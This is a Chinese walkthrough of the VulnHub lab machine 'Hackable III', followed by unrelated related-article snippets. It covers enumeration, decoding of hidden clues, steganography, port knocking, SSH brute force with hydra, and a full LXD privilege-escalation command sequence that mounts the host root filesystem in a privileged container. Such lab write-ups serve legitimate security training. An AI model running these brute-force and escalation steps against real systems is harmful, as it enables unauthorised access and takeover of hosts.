HACKABLE: III实战演练

news2025/1/18 21:01:33

文章目录

      • HACKABLE: III实战演练
          • 一、前期准备
            • 1、相关信息
          • 二、信息收集
            • 1、端口扫描
            • 2、访问网站
            • 3、查看网站源码
            • 4、扫描目录
            • 5、访问网址
            • 6、查看并下载
            • 7、访问网站
            • 8、查看文件
            • 9、解密
            • 10、访问网站
            • 11、访问网站
            • 12、查看文件
            • 13、解密
            • 14、访问网站
            • 15、访问网站
            • 16、下载图片
            • 17、隐写
            • 18、敲端口并端口扫描
            • 19、暴力破解
            • 20、远程连接
          • 三、后渗透
            • 1、查看文件
            • 2、查看文件
            • 3、切换用户
          • 四、提权
            • 1、提权
            • 2、访问目录

HACKABLE: III实战演练

一、前期准备
1、相关信息

靶机网站:https://www.vulnhub.com/entry/hackable-iii,720/

设备名称IP地址
靶机:Hackable III192.168.2.64
攻击机:kali192.168.2.22
二、信息收集
1、端口扫描
kali@kali:~$ nmap -A 192.168.2.64
# 开放WEB:80端口

在这里插入图片描述

2、访问网站
http://192.168.2.64

在这里插入图片描述

3、查看网站源码
# 发现用户名:jubiscleudo	邮箱:dev_suport@hackable3.com和登录界面

在这里插入图片描述

4、扫描目录
kali@kaliL:~$ sudo dirsearch -u "http://192.168.2.64/"

在这里插入图片描述

5、访问网址
http://192.168.2.64/backup/
# 发现一个Wordlist.txt

在这里插入图片描述

6、查看并下载
kali@kali:~$ wget "http://192.168.2.64/backup/wordlist.txt"

在这里插入图片描述

在这里插入图片描述

7、访问网站
http://192.168.2.64/config/
# 发现一个1.txt文件

在这里插入图片描述

8、查看文件
# 发现是Base64编码

在这里插入图片描述

9、解密

网址:https://base64.us/

在这里插入图片描述

10、访问网站
http://192.168.2.64/config.php 
# 查看源代码

在这里插入图片描述

11、访问网站
http://192.168.2.64/css/
# 发现2.txt

在这里插入图片描述

12、查看文件
# 发现是Brainfuck/Ook! 编码

在这里插入图片描述

13、解密

网址:https://tool.bugku.com/brainfuck/

# 将密文输入至文本框,点击BrainFuckToText

在这里插入图片描述

在这里插入图片描述

14、访问网站
http://192.168.2.64/login.php 
# 查看源代码,发现有一个3.jpg

在这里插入图片描述

15、访问网站
http://192.168.2.64/3.jpg
# 发现是一张图片

在这里插入图片描述

16、下载图片
kali@kali:~$ wget "http://192.168.2.64/3.jpg"

在这里插入图片描述

17、隐写
kali@kali:~$ steghide extract -sf 3.jpg
kali@kali:~$ cat steganopayload148505.txt

在这里插入图片描述

18、敲端口并端口扫描
# 通过搜集信息,寻找到了三个端口地址:10000,4444,65535,敲端口,发现22端口开放
kali@kali:~$ knock 192.168.2.64 10000 4444 65535
kali@kali:~$ nmap -A 192.168.2.64

在这里插入图片描述

19、暴力破解
kali@kali:~$ hydra -l jubiscleudo -P /home/kali/wordlist.txt 192.168.2.64 ssh
# 用户名:jubiscleudo	密码:onlymy

在这里插入图片描述

20、远程连接
kali@kali:~$ ssh jubiscleudo@192.168.2.64

在这里插入图片描述

三、后渗透
1、查看文件
# 在网站目录下发现新用户名
jubiscleudo@ubuntu20:/var/www/html$ cat .backup_config.php

在这里插入图片描述

2、查看文件
# 查看系统是否存在此用户名
jubiscleudo@ubuntu20:~$ cat /etc/passwd

在这里插入图片描述

3、切换用户
jubiscleudo@ubuntu20:/var/www/html$ su hackable_3

在这里插入图片描述

四、提权
1、提权

访问网址:https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

# 通过id显示,查找后发现lxd有相关提权方式,选择其中一种方法,
# build a simple alpine image
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686

# import the image
lxc image import ./alpine*.tar.gz --alias myimage # It's important doing this from YOUR HOME directory on the victim machine, or it might fail.

# before running the image, start and configure the lxd storage pool as default 
lxd init

# run the image
lxc init myimage mycontainer -c security.privileged=true

# mount the /root into the image
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true

# interact with the container
lxc start mycontainer
lxc exec mycontainer /bin/sh
hackable_3@ubuntu20:~$ git clone https://github.com/saghul/lxd-alpine-builder
hackable_3@ubuntu20:~$ cd lxd-alpine-builder
hackable_3@ubuntu20:~$ sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-hackable_3@ubuntu20:~$ releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
hackable_3@ubuntu20:~$ sudo ./build-alpine -a i686
hackable_3@ubuntu20:~$ lxc image import ./alpine*.tar.gz --alias myimage
hackable_3@ubuntu20:~$ lxd init
hackable_3@ubuntu20:~$ lxc init myimage mycontainer -c security.privileged=true
hackable_3@ubuntu20:~$ lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
hackable_3@ubuntu20:~$ lxc start mycontainer
hackable_3@ubuntu20:~$ lxc exec mycontainer /bin/sh

在这里插入图片描述

2、访问目录
# 在mnt下发现root

在这里插入图片描述

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/576122.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

CrossOver软件好用吗?最新版22.1.1有哪些优势功能

CrossOver2023是一款系统兼容软件 让您可以在Mac和Linux系统上运行Win应用,不必重启系统,不必使用虚拟机。通过CrossOver, 您可以从dock直接启动Wind应用,与您的Mac和Linux系统功能无缝集成。crossover兼容软件是可以在苹果电脑中…

oracle的基本使用(建表,操作表等)

一、表空间,用户 1、创建表空间 使用system登录 创建表空间 waterboss 为表空间名称datafile 用于设置物理文件名称size 用于设置表空间的初始大小autoextend on 用于设置自动增长,如果存储量超过初始大小,则开始自动扩容next 用于设置每次…

tiechui_lesson14_网络连接请求的拦截

这一节主要学习网络请求的过滤,铁锤大佬讲了些关于IRP的知识。 笔记 先祭出一张灵魂作画,这是用来描述IRP的流转形式的。 通过这幅图着重解释了一下IoSkipCurrentIrpStackLocation(pirp);的过程,就是在流转到当前的IRP请求之后&#xff0c…

Jarvis OJ pwn——level1

checksec&& 运行 ida main函数里的vulnerable_function函数存在溢出 给输入分配的栈空间为0x88 利用思路 ret2shellcode 代码 Author : 白银 Date : 2023-05-27 14:43:28 LastEditors : 白银 LastEditTime : 2023-05-27 16:52:19 FilePath : /pw…

五十行代码教你写一个简单的内存池(二级指针的应用)

固定大小内存的内存池实现 该内存池是一个很简单的内存池,只能申请固定大小的内存,仅供学习 要点: 构造隐式链表二级指针 存储结构 typedef struct mempool_s{int block_size; // 每一块的大虚哎int free_count; // 剩余有多少块是可以…

C#医院LIS系统源码 LIS实验室管理信息系统源码 LIS检验系统源码

1、LIS系统技术框架 (1)总体框架: SaaS架构的Client/Server应用 服务可伸缩,多服务协同 服务可拆分,功能易扩展 (2)技术细节: 体系结构:Client/Server架构 客户端…

资深SRE带你看阿里云香港故障

一、故障背景 12月18日阿里云香港Region发生重大故障,多个重要互联网服务受到影响,包括澳门日报、金融管理局、澳门银河、莲花卫视、澳门水泥厂等基础服务,澳觅和MFood等外卖平台,多个区块链交易所也受到影响。详情见官方故障报告…

第12课【DMA 直接数据访问】直接数据访问 效率 数据总线冲突 通道 仲裁器

目录 简介功能框图请求通道仲裁器 使用配置传输方向数据量传输模式 实例分析存储器间传输存储器到外设 简介 DMA(Direct Memory Access 直接内存访问)指的是STM32中的一个外设。它可以在无需CPU介入的情况下,实现外设和存储器之间或存储器与…

毕业季,给大家用python画一个飞机吧~预祝大家一帆风顺

前言 嗨喽,大家好呀~这里是爱看美女的茜茜呐 今天我们主要用到turtle这个模块,它是python自带的, 所以无需安装,我们直接导入使用就好了~命令如下: import turtle那这个模块有什么作用呢? 它是python中…

LeetCode刷题(ACM模式)-02链表

参考引用:代码随想录 注:每道 LeetCode 题目都使用 ACM 代码模式,可直接在本地运行,蓝色字体为题目超链接 0. 链表理论基础 0.1 链表定义 链表是一种通过指针串联在一起的线性结构,每一个节点由两部分组成&#xff1a…

01背包问题-递推公式的自我理解与LeetCode 416. 分割等和子集

学算法好痛苦,完全是对我智力的一次次折磨,看了好多博客,对二维dp数组的理解都是直接搬了代码随想录,搬了随想录又没详细解释,大家都是一眼看懂的吗,好吧() LeetCode 416. 分割等和子…

华侨大学主题模版

华侨大学主题模版 适用于 课程作业、实验报告、项目策划、毕业论文、毕设答辩... 这是一个非官方项目,仅供个人学习研究。 🚀 指南 📖 仓库简介 该仓库提供了一系列适用于课程作业、实验报告、项目策划、毕业论文、毕设答辩等场景的华侨大…

API接口对电商平台有怎样的帮助?如何获取API接口?

API(Application Programming Interface)接口对电商平台有很多帮助,下面列举几点: 1.提高效率 API接口可以让电商平台的不同模块之间进行快速的数据交互,帮助平台实现更高效的业务处理。比如,在订单管理和…

牛客网学习之倒置字符串(详解fgets函数,如何读取含有空格的字符串)

题目要求&#xff1a; 过程分析&#xff1a;&#xff08;大致思路&#xff09; 具体代码&#xff1a; #include <stdio.h> #include <string.h> /*逆序字符串*/ void reverse(char* begin,char* end) {while (begin < end){char temp *begin;*begin *end;*en…

程序员的出路是什么?

做为一个程序员&#xff0c;工作了一定时间后&#xff0c;一定会有一个想法&#xff0c;那就是程序员能干多久&#xff0c;未来的发展方向是什么&#xff0c;更专业一点的说法是&#xff0c;职业规划到底是什么。 说实话&#xff0c; 我也仔细考虑过这个问题&#xff0c;偶尔也…

基于 HTTP Range 实现文件分片并发下载!

目录 前言 基础下载功能 进阶下载功能 单片下载 多片下载 浏览器发送预检&#xff08;preflight&#xff09;请求 express 不支持多段 range multipart/** 搭配 boundary** 分片下载功能 “只读的” ArrayBuffer 对象 DataView 子类 Uint8Array 操作二进制数据 Bl…

不愧是腾讯出来的,太厉害了...

前段时间公司缺人&#xff0c;也面了许多测试&#xff0c;一开始瞄准的就是中级水准&#xff0c;当然也没指望能来大牛&#xff0c;提供的薪资在15-20k这个范围&#xff0c;来面试的人有很多&#xff0c;但是平均水平真的让人很失望。看了简历很多上面都是写有4年工作经验&…

Go对Json的支持[encoding/json]

数据类型中转json的函数 基本数据转json Marshal使用以下与类型相关的默认编码: 布尔值编码为JSON布尔值。 浮点数、整数和数字值编码为JSON数字。 字符串值编码为JSON字符串&#xff0c;强制为有效的UTF-8; 用Unicode替换符文替换无效字节。 这样JSON就可以安全地嵌入到HTML …

2023年5月软考考试真题及答案汇总

2023上半年软考考试在5月27日-5月28日举行&#xff0c;为大家整理了各科目的考试真题及答案&#xff0c;可用于估分。&#xff08;会持续更新哦&#xff09; ​ 2023年上半年系统集成项目管理工程师上午题 1、在&#xff08; &#xff09;领域&#xff0c;我国还远未达到世界…

【数据结构】---几分钟简单几步学会手撕链式二叉树(中)

文章目录 前言&#x1f31f;一、二叉树链式结构的实现&#x1f30f;1.1 二叉树叶子节点个数&#x1f4ab;代码&#xff1a;&#x1f4ab;流程图&#xff1a; &#x1f30f;1.2 二叉树的高度&#x1f4ab;第一种写法(不支持)&#xff1a;&#x1f4d2;代码&#xff1a;&#x1f…